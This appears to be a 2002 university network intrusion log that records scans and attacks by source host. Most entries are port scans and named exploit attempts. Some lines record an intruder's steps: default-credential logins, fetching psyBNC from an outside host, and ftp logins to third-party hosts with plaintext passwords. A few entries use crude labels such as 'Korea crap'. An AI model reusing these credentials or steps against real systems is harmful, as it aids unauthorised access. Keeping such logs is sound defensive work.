2002/04/23-05:07:20.16 217.208.61.101 (h101n2fls32o883.telia.com) scannet for port 21
2002/04/23-06:02:06.38 65.94.248.2 (MTL-HSE-ppp206812.qc.sympatico.ca) scannet for port 21
2002/04/23-07:06:11.20 209.78.78.206 (dialup206.lemoorenet.com) scannet for port 21
2002/04/23-07:33:58.29 136.176.194.89 (IRT-178-276.bradley.edu) scannet for port 21
2002/04/23-07:39:08.17 136.176.194.89 (IRT-178-276.bradley.edu) scannet for port 21
2002/04/23-09:15:41.23 202.103.134.119 (CHINANET Guangdong province network,CN) scannet for port 22
2002/04/23-09:52:03.35 217.131.120.133 (SUPERONLINE-AS,Istanbul,Turkey) scannet for port 80,NETBIOS SMB C access
2002/04/23-12:04:52.05 80.116.104.244 (Telecom Italia,IT) scannet for port 21
2002/04/23-12:51:50.47 65.101.181.185 (reater Tucson Econimic Council,AZ,US) scannet for port 6112
2002/04/23-13:08:13.02 202.29.9.9 (Rachabhat Institute Nakhon Pathom,TH) scannet for port 80
2002/04/23-13:17:32.28 213.64.164.59 (h59n1c1o1023.bredband.skanova.com) scannet for port 137,139,80,445
2002/04/23-16:36:44.07 64.228.107.87 (Toronto-ppp221524.sympatico.ca) scannet for port 135
2002/04/23-16:37:22.01 216.208.158.208 (A3-P207.RipNET.com) scannet for port 135
2002/04/23-16:37:24.03 195.175.237.171 (Provider Local Registry,TR) scannet for port 135
2002/04/23-16:37:31.43 216.209.145.65 (Guelph-ppp3522528.sympatico.ca) scannet for port 135
2002/04/23-16:39:00.06 128.134.142.64 (Korea crap) scannet for port 135
2002/04/23-16:39:21.09 68.0.195.157 (ip68-0-195-157.ri.ri.cox.net) scannet for port 135
2002/04/23-19:16:53.86 65.198.68.56 (netmapper.research.lumeta.com) ping scan of several ips on net
2002/04/23-19:42:49.59 202.103.134.119 (CHINANET Guangdong province network,CN) scannet for port 22
2002/04/23-20:09:52.87 140.112.17.106 (donald.ee.ntu.edu.tw) scannet for port 80, sadmind worm attack
2002/04/23-21:30:50.11 65.221.79.23 (frognet.com, Athens,OH,US) scannet for port 80
2002/04/23-21:46:28.47 61.56.228.157 (New Centry InfoComm Tech. Co., Ltd,TAIPEI,TW) scannet for port 21
2002/04/23-22:47:11.74 24.95.74.58 (dhcp9574058.columbus.rr.com) scannet for port 80
2002/04/24-07:55:04.43 212.185.253.140 (cw08.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers.
2002/04/24-07:55:45.42 212.185.253.129 (cw01.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers.
2002/04/24-07:56:31.61 212.185.253.138 (cw06.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers.
2002/04/24-07:56:42.62 212.185.253.139 (cw07.D1.srv.t-online.de) scannet port 80, whisker space splice attack on ips w/out servers.
2002/04/24-08:55:04.08 65.117.102.111:1346 (WATERFORD INSTITUTE) scannet for netbios-name-query
2002/04/24-09:24:52.757310 202.103.134.119 (CHINANET Guangdong province network,CN) scannet port 22
2002/04/24-10:44:19.73 80.130.127.193 (p50827FC1.dip.t-dialin.net) scannet for port 80
2002/04/24-11:01:20.816647 202.57.85.12 (adsl-57.85.12.info.com.ph) scannet NETBIOS SMB C access
2002/04/24-13:19:15.50 132.235.94.25 (OUCOM -ohiou.edu) scannet for port 41524
2002/04/24-13:28:02.40 65.198.68.56 (netmapper.research.lumeta.com) scannet port 33435
2002/04/24-16:05:34.93 211.43.165.212 (korea crap) scannet for port 111, buff overflow attack
2002/04/24-17:06:51.42 132.235.165.234:4680 (dhcp-165-234.east-green.ohiou.edu) scannet for netbios-name-query
2002/04/25-05:39:41.408870 65.221.79.23 (Frognet, Athens, Oh, US) scannet for port 80
2002/04/25-07:42:51.42 212.185.253.131 (cw03.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack
2002/04/25-07:43:10.89 212.185.253.129 (cw01.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack
2002/04/25-07:43:20.72 212.185.253.140 (cw08.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack
2002/04/25-07:43:21.14 212.185.253.138 (cw06.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack
2002/04/25-07:44:15.26 212.185.253.139 (cw07.D1.srv.t-online.de) scannet for port 80 w/whisker space splice attack
2002/04/25-09:13:23.00 132.235.178.107:137 (dhcp-178-107.south-green.ohiou.edu) scannet for netbios-name-query
2002/04/25-11:59:43.68 202.54.39.172 (LEASED LINE CUSTOMER AT BANGALORE-VXL INSTRUMENTS,IN) scannet for port 21
2002/04/25-14:11:46.51 64.51.31.19 (64-51-31-19.client.dsl.net) scannet for port 21
2002/04/25-18:25:17.16 128.230.227.181 (syru227-181.syr.edu) scan several ips for port 3072,1024
2002/04/25-19:50:43.47 217.230.130.120 (pD9E68278.dip.t-dialin.net) scannet with ping
2002/04/26-01:19:17.93 132.235.166.227 (dhcp-166-227.east-green.ohiou.edu) 1. login p1 as root/too, admin/adm,sys/sys, deadmon/daemon
2002/04/26-01:19:17.93 132.235.166.227 (dhcp-166-227.east-green.ohiou.edu) 2. etc.., plus KIRKPATRICK and NPERNAL
2002/04/26-04:30:07.65 203.62.163.68 (pm58.rock.accessin.com.au) scannet port 139, NETBIOS SMB C access
2002/04/26-06:36:04.89 217.120.90.116 (cp8722-b.dbsch1.nb.nl.home.com) scannet for port 445
2002/04/26-06:36:08.09 217.120.90.116 (cp8722-b.dbsch1.nb.nl.home.com) scannet for port 445
2002/04/26-09:21:36.54 62.212.119.141 (aboukir-102-1-30-141.adsl.nerim.net) scannet for port 21
2002/04/26-13:58:21.24 130.102.19.130 (vcporter.executive.uq.edu.au) scannet for port 445
2002/04/26-15:26:57.75 166.104.50.42 (oniom.hanyang.ac.kr) scannet for port 21
2002/04/26-22:23:36.75 200.60.77.82 (FUNDACION DE LIBRO,LIMA,PE) scannet for port 6112
2002/04/26-23:27:18.35 202.145.75.189 (FIC Network Service, INC.,TAIPEI,TW) scannet for port 111,statdx exploit attack
2002/04/27-06:03:50.18 144.138.93.185 (Telstra,canberra, au) scannet for port 27374
2002/04/27-06:08:39.00 161.116.7.147 (Universitat de Barcelona,ES) scannet for port 80
2002/04/27-08:08:25.72 212.120.85.61 (cp117156-a.dbsch1.nb.nl.home.com) scannet for port 80
2002/04/27-17:35:40.55 199.243.123.220 (BEX Engineering Ltd, Ontario,CA) scannet for port 515, 132.235.4.63 ports 23,53
2002/04/27-19:58:33.60 65.93.235.106 (Quebec-HSE-ppp3623407.sympatico.ca) scannet for port 21
2002/04/28-06:13:02.35 208.33.22.151 (UNIDIAL/HPN CONSULTING,KY,US) scan for port 515
2002/04/28-10:55:14.78 210.176.204.166 (mail.luenshing.com.hk) scannet for port 21
2002/04/28-11:21:18.65 65.93.235.106 (Quebec-HSE-ppp3623407.sympatico.ca) scannet for port 21
2002/04/28-14:13:33.00 203.79.64.167 (203-79-64-167.adsl.paradise.net.nz) scannet for port 80
2002/04/28-19:20:05.46 216.244.176.131 (Red Privada Empresarial SA,LIMA,PE) scannet for port 21
2002/04/28-19:52:56.73 163.26.92.129 (Tainan Education Network,TW) scannet for port 21
2002/04/28-20:24:58.27 210.223.80.207 (SENHO MEDICHINE,SEOUL,KR) scannet for port 21
2002/04/28-20:48:43.94 145.254.65.215 (dialin-145-254-065-215.arcor-ip.net) scannet for port 111
2002/04/28-21:09:15.02 80.136.20.223 (p508814DF.dip.t-dialin.net) scannet for port 80
2002/04/29-00:23:04.78 80.129.90.253 (p50815AFD.dip.t-dialin.net) scannet for port 21
2002/04/29-05:05:33.82 12.233.26.105 (12-233-26-105.client.attbi.com) scannet for port 445
2002/04/29-09:59:03.22 65.93.230.35 (Quebec-HSE-ppp3622066.sympatico.ca) scannet for port 21
2002/04/29-13:11:26.91 132.235.197.15 (havoc.cns.ohiou.edu) ping scan of net
2002/04/29-14:13:49.31 212.185.253.131 (cw03.D1.srv.t-online.de) whisker space splice attack - port 80 against 6 ips on net
2002/04/29-14:13:51.32 212.185.253.139 (cw07.D1.srv.t-online.de) whisker space splice attack - port 80 against 8 ips on net
2002/04/29-14:13:59.65 212.185.253.137 (cw05.D1.srv.t-online.de) whisker space splice attack - port 80 against 16 ips on net
2002/04/29-14:14:20.02 212.185.253.138 (cw06.D1.srv.t-online.de) whisker space splice attack - port 80 against 11 ips on net
2002/04/29-14:14:38.63 212.185.253.132 (cw04.D1.srv.t-online.de) whisker space splice attack - port 80 against 3 ips on net
2002/04/29-14:15:31.62 212.185.253.140 (cw08.D1.srv.t-online.de) whisker space splice attack - port 80 against 9 ips on net
2002/04/29-19:55:29.53 212.187.18.23 (23.18.187.212.IN-ADDR.ARPA domain name pointer c18023.upc-c.chello.nl) scannet for port 80
2002/04/29-20:51:14.89 200.206.159.15 (200-206-159-15.dsl.telesp.net.br) scannet for port 21
2002/04/29-22:19:30.44 163.180.116.111 (ica.kyunghee.ac.kr) scannet for port 21
2002/04/29-22:30:47.87 65.93.235.254 (Quebec-HSE-ppp3623555.sympatico.ca) scannet for port 21
2002/04/29-22:53:08.81 65.93.101.185 (Kitchener-HSE-ppp3565066.sympatico.ca) scannet for port 139 - NETBIOS SMB C access
2002/04/30-00:30:12.44 203.106.165.166 (TMnet Telekom Malaysia,MY) 1. scannet for ports 79,161,1524,ping and fingering 123@machine
2002/04/30-00:30:12.44 203.106.165.166 (TMnet Telekom Malaysia,MY) 2. try to login 132.235.4.63 as quota150/quota150
2002/04/30-01:37:33.94 150.164.76.110 (ftp.cecom.ufmg.br) scannet for port 21
2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 1. finger 123@moose, login using passwd=userid. Try to get psybnc by:
2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 2. lynx http:///www.psychoid.lam3rz.de/psyBNC2.2.2
2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 3. ftp 210.115.58.137 user jasung pass kiild00d
2002/04/30-01:38:56.98 203.106.165.166 (TMnet Telekom Malaysia) 4. ftp shell.tracenetwork.net user dramkid pass d00msday.2002
2002/04/30-04:18:39.00 61.147.48.4 (CHINANET Jiangsu province network,CN) some moron using 132.235.1.70 as dns server
2002/04/30-05:58:31.73 212.187.18.23 (c18023.upc-c.chello.nl) 1. HAMMER stocker center w/ 153067 connects to 121 ips port 80.
2002/04/30-05:58:31.73 212.187.18.23 (c18023.upc-c.chello.nl) 2. setup ftp server by getting script/programs from
2002/04/30-05:58:31.73 212.187.18.23 (c18023.upc-c.chello.nl) 3. 212.187.18.23 use/pass = blaat/blaat.
2002/04/30-10:16:40.16 132.235.46.250 (dhcp-046-250.cns.ohiou.edu) scannet for port 161, port 21 on selected ips 2002/04/30-10:40:33.08 212.185.253.[129-140] (*..D1.srv.t-online.de) whisker space splice attacks 2002/04/30-11:24:53.08 217.125.54.27 (217-125-54-27.uc.nombres.ttd.es) scannet for port 21, anon ftp attacks 2002/04/30-12:32:35.00 132.235.28.143 (dhcp-028-143.cns.ohiou.edu) scan 132.235.19.*:139 2002/04/30-12:48:18.82 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/04/30-13:57:41.12 62.123.0.253 (ppp-62-123-0-253.dial.ipervia.it) scannet for port 23, some ips port 111 - rpc port list 2002/04/30-14:17:29.78 212.185.253.129 (cw01.D1.srv.t-online.de) whisker space splice attack - port 80 against 8 ips on net 2002/04/30-18:41:34.52 64.230.102.227 (Ottawa-HSE-ppp244016.sympatico.ca) scan 9 ips for ICMP Address Mask Request,timestamp req. 2002/04/30-23:15:00.75 210.248.126.199 (Ideasland Incorporated,JP) scannet for port 6112 + buff overflow attacks - cde dtspcd